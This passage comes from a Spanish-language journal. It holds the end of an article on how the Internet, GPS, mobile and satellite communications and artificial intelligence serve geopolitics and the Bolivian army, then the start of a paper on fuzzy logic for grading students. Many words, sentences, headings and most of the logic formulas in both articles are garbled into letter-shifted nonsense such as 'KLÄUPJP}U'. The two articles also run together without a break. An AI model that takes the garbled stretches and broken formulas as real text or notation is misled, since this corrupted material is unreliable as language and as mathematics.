desarrollada en los EE.UU. por la DARPA, (AGENCIA DE PROYECTOS DE DEFENSA PARA EL ADELANTO DE LA INVESTIGACIÓN), con el objetivo de proporcionar a los investigadores en temas militares el acceso a las fuentes de información existentes en distintos lugares y facilitar la utilización de los recursos de computación disponibles. ARPAnet permitía a los usuarios disponer del servicio de correo electrónico, el acceso de un usuario a otra computadora conectaKVHSHYLK`SH[YHZMLYLUJPHKLÄJOLYVZLU[YLLSSVZ 3VZ JPLU[xÄJVZ KL (97( PU]LZ[PNHYVU SH PU[LYJVnexión entre redes, lo cual se denominó interredes (internetwork) . Este término se abrevió como INTERNET, y se aplicó a los proyectos de redes y a las redes prototipo que se desarrollan. Para distinguir este medio de las demás redes ARPA decidió escribir el nombre con “i” minúscula cuando se referían a las “internets” en general y, con I mayúscula a su prototipo experimental. Se sostiene que esta idea se ve impulsada y favorecida por la necesidad estratégica de disponer de una red no centralizada, de manera que la posible destrucción de una parte de la red ante un ataque nuclear o cualquier otro con efectos devastadores, no detenga su funcioUHTPLU[V ,Z T\` KPMxJPS KHY \UH KLÄUPJP}U L_HJ[H KLSVX\LLZ0U[LYUL[WLYVW\LKLKLÄUPYZLJVTVSH unión a nivel mundial de miles de redes de computadoras, que se pueden comunicar entre sí gracias a un conjunto de normas y lenguajes comunes de comunicaciones denominadas protocolos . Considero fundamental el conocer asimismo como se realiza la comunicación en la red, es decir cuando se va a intercambiar información o algún dato entre “dos computadoras”, una que origina la información y otra que la recibe, de este aspecto se encargan los protocolos que habíamos mencionado HU[LYPVYTLU[LHZxJVTVKLSHPKLU[PÄJHJP}UKLSH máquina emisora y del tipo de mensaje que se pretende distribuir, las reglas que tienen que seguir las computadoras para poder intercambiar información entre sí, e indicar que los mensajes o la información se la envía por paquetes . De toda esta parte teórica podemos rescatar cómo la informática podría apoyar o lograr impacto en la geopolítica, considerando que la información regional o fundamentalmente aquellos aspectos que tiene relación con la cantidad de población, la conÄN\YHJP}UKLHSN\UHWHY[LKLS[LYYP[VYPV`V[YVZKH- tos ya sean estadísticos o cualquier otro se podrá apreciar con mucho detalle con sólo acceder a una página WEB (Documentos que están compuestos WVY[L_[VLSLTLU[VZT\S[PTLKPHNYmÄJVZZVUPKV vídeo digital...) y vínculos (punteros con la dirección de otras páginas Web, empleados para establecer una conexión automática). Un lugar en Web mantiene en ejecución un programa llamado «servidor de páginas Web» que procesa las peticiones de información, típicamente solicitudes de páginas. Cada documento en uno de estos lugares tiene asignada una dirección única denominada URL). 1.- Impacto En el Factor Político Su explotación adecuada permitirá al factor Político establecer con exactitud las necesidades respecto a la ubicación de los límites fronterizos con los países que nos rodean. Asimismo contar con los datos necesarios respecto al avance o desarrollo de las diferentes regiones del País. En el Factor económico Permitirá contar con la información adecuada respecto a los datos estadísticos y tablas de producción de las diferentes regiones del País, asimismo se podrá establecer los contactos con todo el orbe JVU SH ÄUHSPKHK KL YLHSPaHY SHZ [YHUZHJJPVULZ JVmerciales con otros mercados directamente accediendo a una de las direcciones que proporciona INTERNET, ya sea para la exportación de nuestros productos así como para la importación de algunos productos sin necesidad de realizar viajes hasta el lugar de procedencia. Además su explotación en este caso incide más en la construcción de vías camineras que facilitan la vertebración del territorio. En el factor psicosocial Considerando el sector educativo, permitirá acceder a información de importancia y de actualidad en la juventud estudiantil en todos los niveles de la educación respecto a temas de investigación satisfaciendo sus expectativas y las exigencias del estudio. Por otra parte permitirá también en lo referido a la salud, realizar intercambios de conocimiento así como satisfacer las exigencias de necesidad de medicamentos que no puedan ser suministrados en el País para su pronta importación desde cualquier punto del planeta, facilitando la servidumbre que podría provocar su ubicación en el mercado exterior. P A R A D I G M A 35 P A R A D I G M A 36 En el Factor Militar Permitirá acceder a información actual referida al posible potenciamiento de la Fuerzas Armadas de los diferentes países que rodean al País, determinado sus efectivos, su armamento, así como sus posibilidades, resulta más fácil de determinar. La amplia gama de áreas que tiene establecida INTERNET, facilita a los usuarios acceder a informaciones o realizar las previsiones que permitan hacer frente a cualquier amenaza externa, en este sentido el impacto de la Informática en la Geopolítica se traduce en la elaboración de tablas de Bases de Datos capaces de almacenar información en coordinación con la Corte Nacional Electoral, como ente centralizador de los Registros Civiles del País, contar con una información detallada, acerca del personal disponible de acuerdo a las categorías establecidas para la ejecución de las OO.EE.PP. que le permitirán al conductor militar conocer de cuanto personal dispone para la ejecución de las operaciones, que se podrían presentar como amenaza a la seguridad nacional. Asimismo para la ejecución de comercialización o transacciones acerca del equipamiento o potenciamiento respecto a la adquisición de uniforme y equipo así como de armamento, pudiendo acceder a una serie de ofertas que se encuentran a disposición del usuario. D.- Sistema de Posicionamiento Global (GPS) GPS, es un sistema de navegación basado en 24 satélites, que proporcionan posiciones en tres dimensiones, velocidad y tiempo, las 24 horas del día, en cualquier parte del mundo y en todas las condiciones climáticas. Al no haber comunicación directa entre el usuario y los satélites, el GPS puede dar servicio a un número ilimitado de usuarios. El Sistema de Posicionamiento Global (GPS) está disponible en dos formas básicas: SPS, iniciales de Standard Positioning Service (Servicio de Posicionamiento Estándar), y PPS, siglas de Precise Positioning Service (Servicio de Posicionamiento Preciso). El SPS proporciona la posición absoluta de los puntos con una precisión de 100 m. El código PPS permite obtener precisiones superiores a los 20 m; este código es accesible sólo a los militares de Estados Unidos y sus aliados, salvo en situaciones especiales. Las técnicas de mejora, como el GPS diferencial (DGPS), permiten a los usuarios alcanzar hasta 3 m de precisión. Los investigadores fueron los primeros en usar portadoras para calcular posiciones con una precisión de 1 cm. Los sa- télites GPS llevan relojes atómicos de alto grado de precisión. La información horaria se sitúa en los códigos de transmisión mediante los satélites, de forma que un receptor puede determinar en cada momento en cuánto tiempo se transmite la señal. Esta señal contiene datos que el receptor utiliza para calcular la ubicación de los satélites y realizar los ajustes necesarios para precisar las posiciones. El receptor utiliza la diferencia de tiempo entre el momento de la recepción de la señal y el tiempo de transmisión para calcular la distancia al satélite. El receptor tiene en cuenta los retrasos en la propagación de la señal debido a la ionosfera y a la troposfera. Con tres distancias a tres satélites y conociendo la ubicación del satélite desde donde se envió la señal, el receptor calcula su posición en tres dimensiones. Considerando las bondades del GPS, se puede indicar que su aplicación permitió obtener con precisión la ubicación de los objetivos en la Guerra del Golfo Pérsico, de donde deducimos que su explotación podrá apoyar a las intenciones de expansión de la geopolítica de las naciones, respecto a su empleo el mismo que esta basándose en sistemas informáticos y de avanzada tecnología, JVUÄYTHUKVKLLZ[HTHULYHX\LSHPUMVYTm[PJHH ampliado sus servicios de no sólo aplicación en aspectos domésticos sino también en la geopolítica; la misma que permitirá la obtención de una inforTHJP}U ÄKLKPNUH YLZWLJ[V H HSN\UVZ HZ\U[VZ KL interés para la ejecución de una serie de planes en ILULÄJPVKLSHZVWLYHJPVULZM\[\YHZVZPTWSLTLUte en calidad de información para ampliar la gama de la geopolítica. Impacto En el factor militar Permitirá determinar con exactitud la ubicación de los hitos de nuestra línea de frontera, aspecto que incide en la preparación de las fuerzas para tomar en cuenta la seguridad nacional del País. Evitando cualquier violación de nuestro territorio. Asimismo LUSHHJ[\HSPKHKLS0UZ[P[\[V.LVNYmÄJV4PSP[HYLTWSLHLZ[LTLKPVWHYHLSSL]HU[HTPLU[V[VWVNYmÄJV y el trazado de las proyecciones de las vías de comunicación. En el factor económico Contar con los datos de ubicación exacta de las poblaciones alejadas de la urbe, para proyectar una vinculación caminera que les permita la comercialización de sus productos en el mercado interno, impulsando al avance o desarrollo de las diferentes regiones del País. Telefonía móvil Hoy en día nadie se sorprende al contemplar como las personas se comunican desde su automóvil o simplemente utilizando radioteléfonos portátiles. Estos últimos ofrecen obvias ventajas con respecto al radioteléfono “FIJO” instalado en el automóvil, ya que este último, con un “kit” de adaptación, se puede usar como equipo portátil o equipo móvil para el automóvil. Por ello hay dos aspectos a tener en cuenta, la evolución de las comunicaciones móviles, el peso de los equipos portátiles y la autonomía de la batería. La tendencia en este momento es disponer de equipos portátiles del tamaño de una tarjeta y de gran autonomía, ofrecerá a los usuarios disponer adicionalmente de una terminal para los pequeños radioteléfonos portátiles, con las mismas prestaciones que el teléfono de mesa. Esta tecnología es conocida con el nombre “Cordless telephone” o telefonía sin hilos. Aprovechando este principio de la telefonía móvil se puede asociar a la posibilidad de formar parte de la red con una conexión a INTERNET con todas las ventajas que se podría obtener como cuando se encuentra en un servidor o terminal en un lugar con las condiciones de comodidad adecuadas, es decir con una conexión física con el servidor general, sin ningún tipo de restricciones, la única que podría ser considerada como tal es la disponibilidad de baterías recargables para establecer la comunicación ya sea con INTERNET o con cualquier terminal. De esta manera se podrá evitar el cambio del equipo en función del entorno en que se halle . Toda esta teorización de la Informática permite a la geopolítica disponer de medios necesarios para acceder a información ya sea del tipo texto, video, bases de datos o estadísticos que contribuirán a la ejecución de las operaciones militares, de ahí su impacto para con esta ciencia. Las comunicaciones por satélite pueden tener una incidencia interesante en las aplicaciones debido a la capacidad de difusión intrínseca a las comunicaciones por vía satélite, así como los movimientos de liberalización de las telecomunicaciones . El término VSAT utilizado a nivel internacional, sigUPÄJH ¸=LY` :THSS (WLY[\YL ;LYTPUHS¹ ;LYTPUHS KL HILY[\YHT\`WLX\L|HLUSLUN\HQLSSHUVZLYLÄLYL al tamaño de la antena, que usualmente es 1,2 ó 1,6 metros de diámetro. Esta posibilidad es debida fundamentalmente a los avances tecnológicos, que han permitido incrementar la potencia de transmisión del satélite, lo que produce una mejora en el nivel de la señal de recepción. Esta situación per- mite una economización de recursos debido al gran [YmÄJVX\LZVWVY[HKLLZ[HJPVULZ[LYYLUHZLZ[HZPtuación permite a la geopolítica establecer todas las medidas de seguridad en la preparación de la defensa nacional y de la conducción estratégica facilitando las previsiones a considerar en caso de un JVUÅPJ[VPUTPULU[L Impacto P A En el factor económico El gran alcance de estos equipos a permitido incursionar en el mundo de los negocios accediendo a las transacciones desde el lugar donde se encuentre, facilitando de esta manera a las comunicaciones así como la de generar nuevos ingresos, en beULÄJPVKLS,Z[HKV En el factor militar De gran empleo en el tema de las comunicaciones porque pudo reemplazar con facilidad a otros medios mucho más obsoletos como las radios (transmisores-receptores), ya que por su practicabilidad y su independencia de la línea física, así como el empleo de fuentes de poder con tamaño considerable, logró reemplazar y satisfacer la necesidad de comunicar habiéndose obtenido resultados satisMHJ[VYPVZ LU SVZ S[PTVZ JVUÅPJ[VZ VJ\YYPKVZ LU LS Altiplano Boliviano en el desarrollo de las operaciones, facilitando la comunicación con las unidades vecinas, así como con el Estado Mayor General. 3H0U[LSPNLUJPH(Y[PÄJPHS 0U[LSPNLUJPH HY[PÄJPHS [tYTPUV X\L LU Z\ ZLU[PKV más amplio, indicaría la capacidad de un artefacto de realizar los mismos tipos de funciones que caracterizan al pensamiento humano. La posibilidad de desarrollar un artefacto así ha despertado la curiosidad del ser humano desde la antigüedad. Con el avance de la ciencia moderna la búsqueda KLSH0U[LSPNLUJPH(Y[PÄJPHSOH[VTHKVKVZJHTPUVZ M\UKHTLU[HSLZ!SHPU]LZ[PNHJP}UWZPJVS}NPJH`ÄZPVlógica de la naturaleza del pensamiento humano, y el desarrollo tecnológico de sistemas informáticos cada vez más complejos. ,ULZ[LZLU[PKVLS[tYTPUV0U[LSPNLUJPH(Y[PÄJPHSZL ha aplicado a sistemas y programas informáticos capaces de realizar tareas complejas, simulando el funcionamiento del pensamiento humano, aunque todavía muy lejos de éste. En esta esfera los campos de investigación más importantes son el procesamiento de la información, el reconocimiento de modelos, los juegos y las áreas aplicadas como R A D I G M A 37 P A R A D el diagnóstico médico. Algunas áreas de la investigación actual del procesamiento de la información están centradas en programas que permiten a un ordenador o computadora comprender la información escrita o hablada, y generar resúmenes, resWVUKLYHWYLN\U[HZLZWLJxÄJHZVYLKPZ[YPI\PYKH[VZ a los usuarios interesados en determinados sectores de esta información. En esos programas es esencial la capacidad del sistema de generar frases gramaticalmente correctas y de establecer vínculos entre palabras e ideas. La investigación ha demostrado que mientras que la lógica de la estructura del lenguaje, su sintaxis, está relacionada con la proNYHTHJP}ULSWYVISLTHKLSZPNUPÄJHKVVZLTmU[Pca, es mucho más profundo y va en la dirección de \UHH\[tU[PJHPU[LSPNLUJPHHY[PÄJPHS Actualmente existen dos tendencias en cuanto al KLZHYYVSSVKLZPZ[LTHZKL0U[LSPNLUJPH(Y[PÄJPHS!SVZ sistemas expertos y las redes neuronales. Los sistemas expertos intentan reproducir el razonamiento humano de forma simbólica. Las redes neuronales lo hacen desde una perspectiva más biológica (recrean la estructura de un cerebro humano mediante algoritmos genéticos). A pesar de la complejidad de ambos sistemas los resultados distan mucho de un auténtico pensamiento inteligente. Impacto En el Factor Militar I G M A 38 Proporciona una serie de ventajas ante la posibilidad de contar con simuladores que permitan obtener o determinar la reacción aproximada a la realidad acerca de simuladores de vuelos, simuladores de explosiones, simuladores de dispositivos militares y sus efectos, contribuyendo al conductor militar, tomar las previsiones para las operaciones futuras basándose en el conocimiento previo. En el Factor Económico Permitirá obtener una serie de proyecciones en base a datos estadísticos para determinar la posible población para la siguiente década, así como el índice de mortandad en una determinada región, asimismo, proporcionar información sobre la proyección productiva de una determinada región. En el factor Psicosocial Permitirá obtener información sobre las tendencias y los posibles hechos que se sucederán basándose en los datos que se le proporcione al ordenador, considerando las tensiones de los diferentes sectores sociales de un Estado. Otros conceptos Todos los que aplicaron los conocimientos geoNYmÄJVZ LU SH JVUK\JJP}U WVSx[PJH OPJPLYVU HJción geopolítica. Por lo tanto, los precursores de la Geopolítica son numerosos y abarcan a ilustres NL}NYHMVZ JPLU[xÄJVZ ÄS}ZVMVZ LZ[HKPZ[HZ LZ[YHtegas, exploradores y navegantes de casi toda la historia universal. El estudio pragmático del espacio geopolítico se apoya en las amplias bases del conocimiento teórico geopolítico, su cometido es asesorar (orientar, guiar y aconsejar) al estadista y al militar (estratega) en general. Tomando en cuenta que la Geopolítica enfoca sus estudios fundamentalmente en un espacio geopolítico extenso, que puede ser el mundo; una región; un Estado; una Nación; un conjunto de Estados o \UmYLHLZWLJPÄJHWLY[LULJPLU[LH\UVVTmZ,Z[Hdos, y para mantener ligados todos estos espacios con información textual o en su defecto visual de algunas zonas; se tendrá que recurrir a la informática, la que con sus bondades y su alta tecnología permitirá obtener amplias informaciones, las mismas que podrán ser recibidas de manera oportuna por la característica de la informática de realizar la administración de la información en forma automática. 7HYH ÄUHSPaHY LZ PTWVY[HU[L ZL|HSHY X\L LU SH HJtualidad la Geopolítica ha logrado su total autonomía, luego de recorrer un camino cubierto de contrariedades; dentro de ella, los estadistas, políticos, diplomáticos y todos los componentes de un Estado, debemos comprender que se trata de la eterna lucha entre el espacio (territorio) y el hombre (Estado) para lograr mejores niveles de vida, y, por otra parte, entre el Estado y otros Estados, para dirimir sus pretensiones. E.- Sociedad, tecnología y educación militar. La tecnología constituye una variable cuyo impac[VPUÅ\`LWVKLYVZHTLU[L[HU[VLULSKLZHYYVSSVVYganizacional de una determinada entidad, como el SVNYV KL Z\Z TL[HZ LZWLJxÄJHZ :PU LTIHYNV Z\ correcta aplicación, no sólo requiere del análisis de determinadas necesidades o de los medios que se encuentran a nuestra disposición. Exige, por sobre todo los supuestos existenciales de la institución u organización en la cual se va a aplicar. En la actualidad se viene insistiendo que en una época donde la información es determinante, la [LJUVSVNxHHWVY[HKLTHULYHZPNUPÄJH[P]HHSVZWYVcesos de desarrollo del talento humano. “En el ámbito militar, la incorporación de la tecnología a los sistemas de la educación se ha veniKV ]LYPÄJHUKV KLZKL OHJL IHZ[HU[L [PLTWV @ KL hecho ha servido de guía para la incorporación a otras entidades educativas. La necesidad de caWHJP[HY LU KL[LYTPUHKHZ mYLHZ H VÄJPHSLZ ` Z\IVÄJPHSLZ LU WSHaVZ YLK\JPKVZ KL LZWLJPHSPaHY LU LS uso de determinadas armas, o sistema de arma, o de entrenamiento a los mandos y sus asesores, ha hecho necesario recurrir al desarrollo o adaptación de nuevas tecnologías de enseñanza, tales como sistemas de simulación y de auto-instrucción” . Sin embargo el empleo de tecnología no determina por si sola la optimización de los resultados en las diferentes realidades en que están insertas las distintas instituciones. Las características particulares de su recurso humano, la brecha tecnológica entre los distintos países, el modelo de organización son aspectos que deben estar presentes a la hora de decidir que sistemas o procedimientos tecnológicos es necesario incorporar y que sentido debemos darles a los mismos. Baste señalar que hay Ejércitos cuyo marco valórico, formas de compensación, estilo de vida de sus integrantes son más próximos a un modelo “ocupacional”, es decir orientado a la disposición de los posibles destinos de su persoUHS JVUZPKLYHUKV Z\Z OHIPSPKHKLZ J\`V WLYÄS LZ diferente a otros que mantienen un modelo más cercano al “institucional”, que busca lograr mayor profesionalidad dentro de su estructura, ello marcó diferencias que no se pueden eludir. La Tecnología y su Impacto en la Educación Militar La preparación de los recursos humanos mediante el empleo de tecnología, invariablemente lleva a pensar en el concepto de tecnología de la información, entendiendo como tal al conjunto de herramientas y metodología sustentadas en un medio digital con el propósito de apoyar la toma de decisiones o los procesos educativos aspecto este último directamente relacionado con nuestro tema. En este sentido, es necesario establecer la esencia del concepto en sí, lo que implica aceptar que SH[LJUVSVNxHLUILULÄJPV`HWV`VKLSHLK\JHJP}U se encuentra en permanente estado de evolución, derivado del cambio en computadores personales, del software o programas computacionales y de los sistemas de comunicación de datos. La tecnología de la información se ha nutrido de la unión de los avances de la informática y de las telecomunicaciones, produciendo una revolución en el dominio y valor del conocimiento al hacerlo accesible a los más variados sectores, cambiando, por consiguiente, las concepciones clásicas de educación generalmente aceptadas, en donde ciertos formalismos derivados de la interrelación educador–educando dentro del aula, han sido ampliados a un concepto en que la globalidad e interacción es la esencia de los nuevos métodos de enseñanza. Hoy en día la información es sinónimo de poder, y sus herramientas de operación son el acceso, la rapidez de su obtención y la capacidad de almacenamiento. En la actualidad todas las reparticiones que se LUJ\LU[YHU IHQV SH PUÅ\LUJPH KLS THULQV KL SH PUformación en forma automática han estandarizado Z\ZZPZ[LTHZPUMVYTm[PJVZJVULSÄUKLVI[LULYLS máximo partido de las tecnologías. Esta última característica se consideró fundamental, puesto que el impacto de las tecnologías de la información en la mejora de la gestión organizacional se relaciona a la disposición para invertir en forma oportuna y en los montos necesarios, en los recursos humanos. Impactos y riesgos involucrados El desarrollo de la tecnología de la información y su THZPÄJHJP}U OH NLULYHKV JHTIPVZ KYHTm[PJVZ LU la sociedad. Algunos investigadores han realizado estudios acerca de la repercusión de dicho fenómeno causa en determinadas organizaciones. En tal sentido podemos indicar que se han producido cambios cualitativos en el medio ambiente de las personas, ya que el número de niveles jerarquizados tiende a reducirse, y aunque en algunos casos se obtengan ejemplos contrarios, se ve sobrepasada la concepción tradicional de amplitud de control. Además, se producen cambios en la estructura de la organización y hay efectos diferenciados en los componentes de la organización, es decir, la tecnología no afecta por igual a todos. Por otra parte la preparación del recurso humano KLU[YVKLSHVYNHUPaHJP}UTPSP[HYZL]LUYLÅLQHKVZ en los adelantos que vienen demostrando todo este personal que explota al máximo la información de la tecnología. Por otra parte los cambios cuali[H[P]VZZLTHUPÄLZ[HUJVTV\UWYVJLZV[YHUZKPZJPplinar dinámico, interactivo y colaborador entre los diversos involucrados, lo que implica que el docente pierde parte de su connotación presencial y autoritaria, variando hacia una imagen de inducción y complementación centrada en el educando. CONCLUSIONES Una adecuada explotación, de los medios que pone a disposición la informática, en INTERNET, brindara una serie de ventajas a los usuarios, sin JVUZPKLYHYLZWLJxÄJHTLU[LLS[PWVKL\Z\HYPVW\- P A R A D I G M A 39 P A R A D diendo ser explotado en el área de la educación, la economía, las estadísticas, los comercios, datos regionales, actualidades respecto al adelanto de algunos países, y una serie de ventajas que permiten su explotación y contribución a la geopolítica de las naciones. La implementación de los medios necesarios para que las instituciones que ejercen la educación puedan acceder a éste servicio, permitirá en este universo contar con un conocimiento actualizado acorde a los adelantos de la tecnología. El adecuado adiestramiento en el manejo de los GPS y la preparación de elementos para el manejo de los diferentes medios que permite o brinda la tecnología al servicio de la geopolítica, logrará satisfacer las necesidades de precisión en el trazado de las vías de comunicación así como en la ubicaJP}UL_HJ[HKLHSN\UVZHJJPKLU[LZNLVNYmÄJVZ[HS como la ubicación de los hitos en contribución o como elemento coadyuvante a las relaciones exteriores del País. todo el personal, como un recurso de precisión y manejo de información, estimulando asimismo al personal de la institución a la investigación. Esto no solamente para el sector militar, asimismo al sector estudiantil en todos los niveles les permite estar actualizados con los adelantos tecnológicos de la humanidad y a la par de los nuevos desafíos del nuevo orden mundial. E. Las decisiones y actividades externas de las naciones, son respuestas a una variedad de estímulos tanto internos como externos, las naciones son sistemas con estímulos (“inputs” o entradas), reacciones (“outputs” o salidas) y retroalimentación (“feedback”), en interacción constante con el medio ambiente internacional, ante esta situación la complejidad de la informática permitirá contribuir de THULYHZPNUPÄJH[P]HHSH.LVWVSx[PJH F. La aplicación de sistemas simuladores permitirá grandes ventajas en todos los factores KLWVKLYILULÄJPHUKVH[VKHSHJVSLJ[P]PKHK en su conjunto. Se hace necesaria la implementación de un Sistema Informático en el Ejército boliviano accesible a I G M A 40 Laboratorio de Redes DIFUSIDAD EN EL RENDIMIENTO ACADÉMICO Luisa Velásquez López Instituto de Investigaciones en Informática – Universidad Mayor de San Andrés Av. Villazon (La Paz) Bolivia Tel. 79543904; [email protected] RESUMEN La investigación teórica y la experiencia académica da como resultado el siguiente artículo. La evaluación del desempeño de los estudiantes, desde el ámbito pedagógico, es una actividad demasiado compleja, porque debe tomar en cuenta muchos aspectos. La presente investigación no se considera como una herramienta de evaluación del estado cognitivo del estudiante, más bien presenta una faceta, para medir el nivel de conocimiento utilizando, la imprecisión, y la necesidad de un medio de almacenamiento para las mismas. La Lógica Borrosa es una teoría empleada para maULQHYSHPTWYLJPZP}UWYVW\LZ[HWVY3V[ÄAHKLOLU 1965. La principal aplicación de la lógica borrosa se encuentra en el control y a partir de los 80 se extiende su uso, en problemas de la vida diaria. Los conjuntos crisp o conjuntos clásicos están deÄUPKVZWVYZ\M\UJP}UJHYHJ[LYxZ[PJH! enfrentar situaciones del mundo real, situaciones complejas y dinámicas, de la misma forma existe la necesidad de almacenar dicha información en una base de datos borrosa. La evaluación del estudiante a partir de medidas [YHKPJPVUHSLZ WYLZLU[H JPLY[HZ KPÄJ\S[HKLZ WVYX\L el docente puede asignar notas imprecisas dependiendo de la experiencia y la sensibilidad, porque en realidad la nota que se le asigna a un estudiante es una aproximación humana cuando evalúa los exámenes. Es importante hacer notar que cuando el docente evalúa, generalmente utiliza términos lingüísticos como, excelente, bueno, regular, las cuales son ambiguos y totalmente subjetivos y la lógica difusa es la apropiada para proporcionar etiquetas lingüísticas. Como se ve en la Fig. 1, se tiene el universo del discurso [0,100] (notas de evaluación utilizaKHZ`ZLW\LKL]LYX\LLZPUZ\ÄJPLU[LWLYV LZTLUVZPUZ\ÄJPLU[L xA : X {0,1} _(_$b_?c_ ?d A: X [0,1] y sus operaciones: Unión, Intersección, Diferencia, Complemento. Los conjuntos clásicos permiten el almacenamiento KLSHPUMVYTHJP}UKLTHULYHIPLUKLÄUPKHWVYX\L sus valores de umbral, tienen dos valores de verdad: verdadero ó falso, 1 ó 0, sí ó no. Pero muchos de los problemas expresadas por las personas son de forma ambigua, y la lógica borroZHIHZHZ\KLÄUPJP}ULU\TIYHSLZKLKLJPZP}UWHYH A R A D I G y sus operaciones básicas: Unión, Intersección, Diferencia. 7VYV[YVSHKVSVZJVUQ\U[VZIVYYVZVZLZ[mUKLÄUPdos por su función de pertenencia: P Fig. 1 Representación de conjuntos difusos Las etiquetas lingüísticas permiten a los docentes, KLÄUPYZ\ZLZ[YH[LNPHZKLL]HS\HJP}U M ABSTRACT Theoretical research and academic experience results in the following article. The evaluation of student performance, from the pedagogical, is an activity too complex because it must take into account many aspects. This research is not considered as an assessment tool of student’s cognitive state, rather represents a facet, A 41 P A R A D I G M A 42 to measure the level of knowledge using, imprecision, and the need for a storage medium for them. Fuzzy Logic is a theory used to handle the impreJPZPVUWYVWVZLKI`3V[ÄAHKLOPU ;OLTHPU application of fuzzy logic is in control and from the 80 it is widely used in daily life problems. *YPZWZL[ZHUKJSHZZPJHSZL[ZHYLKLÄULKI`P[ZJOHracteristic function: xA: X {0,1} _(_$b_?c_ ?d and its basic operations: Union, Intersection, Difference. 6U [OL V[OLY OHUK M\aa` ZL[Z HYL KLÄULK I` P[Z membership function: A: X [0,1] and operations: Union, Intersection, Difference, Complement. The classical ensembles allow storage of informa[PVUPUH^LSSKLÄULKILJH\ZL[OLPY[OYLZOVSK]HS\LZ have two truth values: true or false, 1 or 0, yes or no. But many of the problems expressed by people are HTIPN\V\Z HUK M\aa` SVNPJ IHZLK P[Z KLÄUP[PVU VU decision thresholds to address real-world situations, complex and dynamic situations, just as there is a need to store that information in a fuzzy database. Student evaluation from traditional measures has JLY[HPU KPMÄJ\S[PLZ ILJH\ZL [OL [LHJOLY JHU HZZPNU notes inaccurate depending on the experience and sensitivity, because in reality the note is assigned to a student is a human approach when evaluating tests. It is important to note that when the teacher evaluates language generally uses words such as excellent, good, fair, which are totally subjective and ambiguous and fuzzy logic is appropriate to provide linguistic labels. As seen in Figure 1, we have the universe of discourse [0.100] (used evaluation notes), and you can see that 0 is not enough, but 40 is less inadequate. INTRODUCCIÓN Los subconjuntos borrosos son un acercamiento entre la precisión de las matemáticas clásicas y la imprecisión del mundo real con el objetivo de lograr una mejor comprensión de los procesos mentales y del conocimiento. Los ordenadores actuales no pueden pensar y razonar en términos imprecisos, no cuantitativos, “borrosos”. Esta es la diferencia con el hombre, que puede comprender la semántica en cualquier comunicación escrita u oral, es decir puede realizar el análisis, la concreción, la abstracción o la síntesis. La matemática clásica maneja el concepto de “conjunto” considerado como una colección de cosas u VIQL[VZUH[\YHSLZHY[PÄJPHSLZWYLZLU[LZVM\[\YVZ abstractos o tangibles). Pero la adaptabilidad del ser humano a su entorno natural y social construye abstracciones que no necesariamente son conjuntos, sino conjuntos o subconjuntos borrosos (como los conocimientos populares), conocimientos indeterminados, en las que la transición de membresía a no membresía es mas gradual que brusca. :LW\LKLHÄYTHYX\LJHZP[VKHSHS}NPJHKLSYHaVnamiento humano no es la lógica clásica de dos valores, o incluso de varios valores, sino una lógica de verdades borrosas, de conjunciones borrosas, de reglas de deducción borrosas (Kaufmann, 77). Los fenómenos que se encuentran a diario son imprecisos como una consecuencia natural, que también suceden en los procesos académicos (cognitivos, habilidades, evaluación, almacenamiento, etc.) que puede estar asociada con su forma, posición, momento, etc. Actualmente la evaluación en las materias se basa en una escala de 1 a 100, algunas veces de manera “cualitativa” A, B, C, D, E; escalas que de alguna manera pueden ser arbitrarias. Por ejemplo; cual será la interpretación lógica que usted daría a las siguientes preguntas: ,Z[\KPHU[LZX\LVI[PLULU\UHJHSPÄJHJP}UKL 80%? ,Z[\KPHU[LZX\LVI[PLULU\UHJHSPÄJHJP}UKL 80%, respecto a los estudiantes que obtienen una nota de 60%? :P [VKVZ SVZ LZ[\KPHU[LZ KL \U J\YZV VI[PLnen notas de 51% frente a otro estudiante que tiene 50%? Las interpretaciones quizá sean de que el estudiante que obtiene 80% es mejor estudiante o excelente, el LZ[\KPHU[LX\LVI[PLULLZYLN\SHYVZ\ÄJPLU[LV de acuerdo a las escalas vigentes en cada institución y ¿qué del estudiante que obtiene la nota de 50%? +LSHZJHSPÄJHJPVULZWYVW\LZ[HZJHKHWLYZVUHYLHSPaH una interpretación diferente de acuerdo a su lógica WLYZVUHSVLZWVU[mULH,UJVUZLJ\LUJPHSHZJHSPÄJHciones son difusas en cuanto a la capacidad cognitiva habilidades y destrezas de dichos estudiantes. LÓGICA Relacionando la ciencia de la informática y la lógica +LH|V(+LÄULJVTV¸SHJPLUJPHKLSVZWYPUJPWPVZ de la inferencia formalmente válida”. Por otro lado la lógica como herramienta de la in]LZ[PNHJP}UJPLU[xÄJH[YH[HKLMVYTHSPaHYSVZHJ[VZ` signos del ser humano del lenguaje, de los conceptos, oraciones frases y razonamientos. Existe una variedad de lógicas que tratan de formalizar el punto anteriormente indicado, como ser: 3}NPJHKLWYVWVZPJPVULZ 3}NPJH KL WYLKPJHKVZ KL WYPTLY ZLN\UKV tercer orden. 3}NPJHTVKHS 3}NPJHT\S[P]HS\HKH 3}NPJHKPM\ZHTHZJVUVJPKVJVTVM\aa`SVgic Interpretación de Proposiciones Sea el siguiente razonamiento: Si asiste a clases y realiza los trabajos de investigación entonces aprueba la materia Formalizando: p: asiste a clases q: realiza los trabajos de investigación r: aprueba la materia. p, q, r son variables proposicionales no asiste a clases y realiza los trabajos entonces no aprueba la materia i2v : razonamiento valido +L 7 $UL_PZ[LUSVZLZ[\KPHU[LZX\LUVHZPZ[LU a clases y realizan los trabajos pero aprueban la materia. P!W=X=Y-"W X Y- La interpretación de i6 es correcta, porque el resultado es iF Entonces si: i0v, i1v, i2v, i3v, i4v, i5v, i6v, i7v ,SYHaVUHTPLU[VKLW X YLZ]mSPKV& Interpretación General Todos los estudiantes(as) que estudian aprueban con nota excelente: £LZLZ[\KPHU[LHX\LLZ[\KPH ,U[VUJLZ£HWY\LIHJVUUV[HL_JLSLU[L +LÄUPLUKV]HYPHISLZ! c: estudiantes(as) que estudian a: aprueban con nota excelente Y!£LZLZ[\KPHU[LHX\LLZ[\KPH Z!£HWY\LIHJVUUV[HL_JLSLU[L Formalizando P1: c a P2: r C: s Interpretación Sea el par I = (i,v) Donde: v: valores semánticos i: aplicación de p en v P!W-X-Y-"W X Y= no asiste a clases y no realiza los trabajos entonces no aprueba la materia i0v : la interpretación es válida P!W-X-Y="W X Y= no asiste a clases y no realiza los trabajos entonces aprueba la materia i1v : ¿Esta interpretación es correcta? A simple análisis la interpretación del razonamiento podría ser no válido, pero lo es. P!W-X=Y-"W X Y= En realidad no se puede concluir s porque r es concreto, es decir, ya esta en a global, entonces en la lógica de proposiciones no se formaliza este tipo de razonamiento. Interpretación de Predicados La anterior formalización podemos expresarla, 